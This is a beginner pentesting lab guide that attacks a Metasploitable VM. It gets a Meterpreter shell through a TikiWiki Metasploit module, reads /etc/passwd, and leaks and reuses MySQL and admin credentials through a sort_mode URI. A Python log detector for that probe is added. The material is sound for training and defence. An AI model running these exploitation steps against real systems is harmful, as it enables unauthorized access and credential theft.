Exploitation
n00bpentesting.com
Lab Guide Three

Contents
Prerequisites (Hardware, Software) ... 3
Topics Covered ... 4
A Note ... 4
Before You Begin ... 4
Lab One – Exploitation ... 5
Answer: Exploit-db Challenge ... 10
What’s Next? ... 15
Twitter @shai_saint
2
Prerequisites
Thank you for downloading the n00bpentesting.com Lab Guide Three. This guide is designed to help the n00b penetration tester get their feet wet with some of the tools covered on n00bpentesting.com while honing their skills following the Penetration Testing Execution Standard.
Hardware
• Computer with Linux, Windows, or Mac OSX
• 4GB RAM
• Hard drive with at least 50GB
Software
• VirtualBox Virtualization Software: http://www.virtualbox.org/wiki/Downloads
• BackTrack 5 R1 Virtual Machine: http://www.backtrack-linux.org/downloads
• Windows XP SP2 Virtual Machine: supply your own copy or use a NIST image (NIST: http://nvd.nist.gov/fdcc/download_fdcc.cfm)
• Metasploitable Virtual Machine: http://updates.metaspoit.com/data/Metasploitable.zip.torrent
Topics Covered
• Exploitation
A Note
All n00bpentesting.com guides will follow applicable sections of the Penetration Testing Execution Standard (PTES). It is highly recommended that any penetration tester or one who wants to move into this field should read and regularly reference the standard. It can be found here: http://www.pentest-‐standard.org/
Before You Begin
It is important to update BackTrack, SET, and Metasploit before you begin each lesson. Updating these packages will ensure the latest tool updates and fixes are applied for better stability and exploit success.
To Update BackTrack: at the command prompt type: apt-get update && apt-get upgrade && apt-get dist-upgrade, press ENTER
To Update SET: at the command prompt type: cd /pentest/exploits/set && svn update, press ENTER
To Update Metasploit: at the command prompt type: cd /pentest/exploits/framework && svn update, press ENTER
Lab One – Exploitation
In this lab you will learn how to leverage the verified Metasploit vulnerability to exploit the target. You have researched the applications on the target system and verified that there is a vulnerability to exploit using Metasploit. We will use the vulnerability we verified, “tikiwiki_graph_formula_exec”. I will also share the answer to the exploit-db challenge.
1. Start the BackTrack VM
2. Start the Metasploitable VM
3. In the BackTrack VM, update Metasploit by typing at the command prompt: msfupdate, press ENTER
Once the update is finished you will be at revision 14418 or higher.
4. Start Metasploit, at the command prompt type: msfconsole, press ENTER
When Metasploit is started, you will see when it was last updated.
We will now instruct metasploit to use the exploit we researched; “tikiwiki_graph_formula_exec”.
5. At the msfconsole type: use exploit/unix/webapp/tikiwiki_graph_formula_exec, press ENTER
We will need to tell the exploit the target IP address.
6. At the msfconsole type: show options
This will show the available options that can be configured for the exploit. Some options such as RPORT and URI already have settings and are ok as set. We need to provide the RHOST.
7. At the msfconsole type: set RHOST “metasploitable_IP_Address”, press ENTER
This is the only option we need to set; we are now ready to exploit our target.
8. At the msfconsole type: exploit, press ENTER
The exploit will run and, when successful, you will be returned a Meterpreter session.
You have successfully run the exploit on the target system. Meterpreter is a very powerful command shell with many great features.
9. To see what commands are available, at the meterpreter prompt type: help, press ENTER
Take time to look at all the available commands. Here are the available file system commands.
Other commands that are important:
• getuid – show the user the current process is running as
• cd – change directory
• ls – list directory contents
• download – download files from the target
At this point our exploit process is running as www-data. This user will not have the privileges required to make system changes; however, we can still download the /etc/passwd file to get usernames for password brute force attacks.
Also, look at output provided by the exploit. It looks like we obtained the mysql database credentials. Ponder the possibilities.
Answer: Exploit-db Challenge
During the vulnerability research phase there were several exploits available for tikiwiki at exploit-db.com. Let's take a look at “TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability”.
1. Open your browser and go to: www.exploit-db.com
2. Search for “tikiwi”
3. Click on the name of the exploit “TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability”.
A brief description of the exploit is provided, followed by a list of URIs that can be appended to the web application root to dump the database credentials.
4. Open your browser and in the URL address field type: http://metasploitable_IP_Address/tikiwiki
5. Copy the first URI from exploit-db: /tiki-listpages.php?offset=0&sort_mode=
6. Paste this URI after http://metasploitable_IP_Address/tikiwiki
It will look like this: http://192.168.99.102/tikiwiki/tiki-listpages.php?offset=0&sort_mode=
7. Press ENTER
The web page will show an error
8. Scroll down the page and you will be presented with the mysql database credentials.
These DB credentials can now be used to log in to the mysql database.
9. Open a command shell and type: mysql -h “metasploitable_IP_Address” -uroot -proot, press ENTER
You are now logged in to the mysql database as the root user. Let's get the user information from the database.
10. At the mysql prompt type: use tikiwiki195; press ENTER (make sure you type a semicolon (;) after each command)
A message will indicate that the database has been changed.
Let's see what tables exist in the database.
11. At the mysql prompt type: show tables;
A long list of tables will print. We are interested in users_users in the list. To view the contents of the table we need to run a database query called “select”.
12. At the mysql prompt type: select * FROM users_users;
Users currently in the database will be displayed. The user admin with the password admin looks like a good account.
Let's go back to the web page for tikiwiki and log in with these credentials.
13. In your browser go to: http://metasploitable_IP_Address/tikiwiki
14. In the login form enter: admin for both the user and pass, click login
You will be prompted to change the password; make it something easy like “pass123”.
You are now logged into the web application as the administrator!
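Seen from the defender's side, the probe in steps 5 to 7 leaves a recognisable trace in the web server's access log: a request for tiki-listpages.php whose sort_mode parameter is present but empty, which is what triggers the error page that leaks the database credentials. The script below is an added example and is not part of the original lab guide or of TikiWiki or Metasploit; it parses Apache combined-format access log lines and flags that request pattern. The log lines, IP addresses and timestamps are constructed for the example, and treating an empty sort_mode value as the signature is an assumption drawn from the URI listed on exploit-db.

```python
"""Flag the TikiWiki sort_mode information-disclosure probe in Apache access logs.

Added example for the lab guide; the log lines below are constructed, not captured.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample of Apache combined-format log lines (assumed addresses/times).
SAMPLE_LOG = """\
192.168.99.1 - - [10/Jan/2012:10:01:02 -0500] "GET /tikiwiki/tiki-index.php HTTP/1.1" 200 5123
192.168.99.1 - - [10/Jan/2012:10:01:09 -0500] "GET /tikiwiki/tiki-listpages.php?offset=0&sort_mode= HTTP/1.1" 200 2210
192.168.99.1 - - [10/Jan/2012:10:02:30 -0500] "GET /tikiwiki/tiki-listpages.php?offset=0&sort_mode=pageName_asc HTTP/1.1" 200 4420
"""

# Client IP, timestamp, request line (method + target) and status code of a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return a dict with ip, ts, method, target, status, path and parsed query, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep_blank_values=True is essential: the probe's whole point is an empty sort_mode.
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def is_sort_mode_probe(rec):
    """True when the request hits tiki-listpages.php with sort_mode present but empty."""
    return rec["path"].endswith("/tiki-listpages.php") and rec["query"].get("sort_mode") == [""]


def find_probes(log_text):
    """Scan log text and return (ip, timestamp, target, status) for each matching request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_sort_mode_probe(rec):
            hits.append((rec["ip"], rec["ts"], rec["target"], rec["status"]))
    return hits


if __name__ == "__main__":
    for ip, ts, target, status in find_probes(SAMPLE_LOG):
        print(f"sort_mode probe from {ip} at {ts}: {target} -> {status}")
```

Only the second sample line matches: the first has no query string and the third sets sort_mode to a real value. Note that the status code is 200 in the constructed sample; the disclosed credentials are part of the page body, so a detection keyed only on 5xx responses would miss this request.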
What’s Next?
The next step is Post Exploitation. Please see “Intro To Penetration Testing – Lab Guide Four”.